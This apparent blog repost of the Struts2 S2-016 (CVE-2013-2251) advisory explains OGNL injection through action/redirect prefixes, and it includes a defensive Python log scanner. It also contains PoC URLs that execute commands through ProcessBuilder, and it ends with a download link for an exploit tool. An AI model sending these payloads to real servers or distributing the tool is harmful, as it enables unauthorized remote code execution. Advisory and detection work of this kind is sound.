Struts2 latest S2-016 code execution vulnerability CVE-2013-2251
2013-08-03 22:27
This is a code execution vulnerability that uses Java code to execute system commands.
Affected versions: Struts 2.0.0 – Struts 2.3.15
Vulnerability description:
The Struts 2 DefaultActionMapper supports a method for short-circuit
navigation state changes by prefixing parameters with “action:” or
“redirect:”, followed by a desired navigational target expression. This
mechanism was intended to help with attaching navigational information
to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”,
“redirect:” or “redirectAction:” is not properly sanitized. Since said
information will be evaluated as OGNL expression against the value
stack, this introduces the possibility to inject server side code.
Test PoC:
In the Struts Blank App, open following URLs.
Simple Expression – the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Command Execution
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
Solution:
DefaultActionMapper was changed to sanitize “action:”-prefixed
information properly. The features involved with
“redirect:”/“redirectAction:”-prefixed parameters were completely
dropped – see also S2-017.
Official advisory: http://struts.apache.org/release/2.3.x/docs/s2-016.html
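A defender-side check for the pattern described above, as an added example that is not part of the original post or of Struts: it scans access-log request lines for parameter names that begin with the three prefixes and flags those that carry an OGNL expression opener. The log lines are constructed samples, and the function names are illustrative.

```python
import re
from urllib.parse import unquote

# Parameter-name prefixes named in the S2-016 advisory.
PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_OPEN = re.compile(r"[%$]\{")  # start of a %{...} or ${...} expression
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')  # request field of an access log

def decode_fully(text, rounds=3):
    """URL-decode repeatedly so double-encoded input such as %2525{ is normalised."""
    for _ in range(rounds):
        decoded = unquote(text.replace("+", " "))
        if decoded == text:
            break
        text = decoded
    return text

def classify(target):
    """Return ('ognl' | 'prefix', parameter) for the worst parameter, else None."""
    query = target.partition("?")[2]
    finding = None
    for raw in re.split(r"[&;]", query):
        param = decode_fully(raw)
        if not param.startswith(PREFIXES):
            continue
        if OGNL_OPEN.search(param):
            return ("ognl", param)  # expression after the prefix: alert
        finding = finding or ("prefix", param)  # plain target: review only
    return finding

def scan(lines):
    """Return (line_number, verdict, parameter) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        result = classify(match.group(1)) if match else None
        if result:
            hits.append((number, *result))
    return hits

# Constructed sample log lines (client addresses are from documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Aug/2013:22:01:07 +0800] "GET /struts2-blank/example/HelloWorld.action?request_locale=en HTTP/1.1" 200 512',
    '192.0.2.44 - - [03/Aug/2013:22:01:09 +0800] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 404 1024',
    '192.0.2.44 - - [03/Aug/2013:22:01:11 +0800] "GET /struts2-showcase/employee/save.action?redirect:%2525%7B3*4%7D HTTP/1.1" 302 0',
    '192.0.2.21 - - [03/Aug/2013:22:02:30 +0800] "POST /struts2-showcase/employee/edit.action?action:save HTTP/1.1" 200 2048',
]
```

Access logs record only the query string, so prefixed parameters sent in a POST body need the same check at a proxy or WAF that sees the body.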
Download of the exploit tool for the latest Struts2 S2-016 code execution vulnerability: K8_Struts2_EXP_0718[K8]
Download link:
http://pan.baidu.com/share/link?shareid=2765322418&uk=4045637737